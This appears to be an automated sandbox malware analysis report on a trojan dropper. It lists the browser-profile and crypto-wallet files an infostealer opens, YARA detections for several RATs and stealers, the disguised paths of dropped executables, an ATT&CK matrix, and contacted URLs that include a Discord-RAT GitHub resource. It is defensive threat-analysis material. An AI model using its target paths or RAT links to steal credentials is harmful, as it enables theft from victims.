Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7704, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match

File source: 0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Discord Rat

Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\cscript.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\cscript.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	241 Windows Management Instrumentation	111 Scripting	1 Abuse Elevation Control Mechanism	51 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	11 DLL Side-Loading	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	112 Command and Scripting Interpreter	321 Registry Run Keys / Startup Folder	311 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	58 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	321 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	121 Software Packing	LSA Secrets	261 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	161 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	243 Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	161 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
87Bym0x4Fy.exe	69%	Virustotal		Browse
87Bym0x4Fy.exe	61%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
87Bym0x4Fy.exe	100%	Avira	TR/Dropper.Gen
87Bym0x4Fy.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\setup.exe	100%	Avira	TR/CoinMiner.lnxah
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/CoinMiner.lnxah
C:\ProgramData\svchost.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\VbvGgiO8yC.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Uninstall Information\cmd.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\hacn.exe	100%	Joe Sandbox ML
C:\ProgramData\setup.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\Program Files\Uninstall Information\cmd.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	58%	Virustotal		Browse
C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	58%	Virustotal		Browse
C:\Program Files\Google\Chrome\updater.exe	71%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Program Files\Google\Chrome\updater.exe	79%	Virustotal		Browse
C:\Program Files\Uninstall Information\cmd.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files\Uninstall Information\cmd.exe	58%	Virustotal		Browse
C:\ProgramData\Microsoft\based.exe	51%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\Microsoft\based.exe	47%	Virustotal		Browse
C:\ProgramData\Microsoft\hacn.exe	71%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\Microsoft\hacn.exe	62%	Virustotal		Browse
C:\ProgramData\setup.exe	71%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\ProgramData\setup.exe	79%	Virustotal		Browse
C:\ProgramData\svchost.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\svchost.exe	53%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	58%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd	4%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
gateway.discord.gg	0%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gateway.discord.gg	162.159.130.234	true	false	0%, Virustotal, Browse

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://gateway.discord.gg/?v=9&encording=json	false

URLs from Memory and Binaries

Name	Source	Malicious
http://google.com/	based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	based.exe, 00000011.00000003.1818177199.000002A15D8E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1818342182.000002A15DB8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1817815301.000002A15DD1E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1819459988.000002A15DB8D000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/download/releases/2.3/mro/.	RuntimeBroker.exe, 00000007.00000003.1741045639.0000010D2F242000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1776664073.0000010D2F448000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1969519599.0000016BB3BF8000.00000004.00001000.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	false
http://gateway.discord.gg	RuntimeBroker2.0.exe, 00000006.00000002.1984341660.00000222000B5000.00000004.00000800.00020000.00000000.sdmp	false
https://python.org/dev/peps/pep-0263/	hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
https://gateway.discord.gg/?v=9&encording=jsonX	RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
https://yahoo.com/	based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmp	false
https://discord.com/api/v9/guilds/	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp	false
http://cacerts.digicert.co	hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	based.exe, 00000011.00000003.2040687659.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1876089664.000002A15E000000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1991725190.000002A15E006000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15E002000.00000004.00000020.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	false
https://gateway.discord.gg:443/?v=9&encording=json	RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
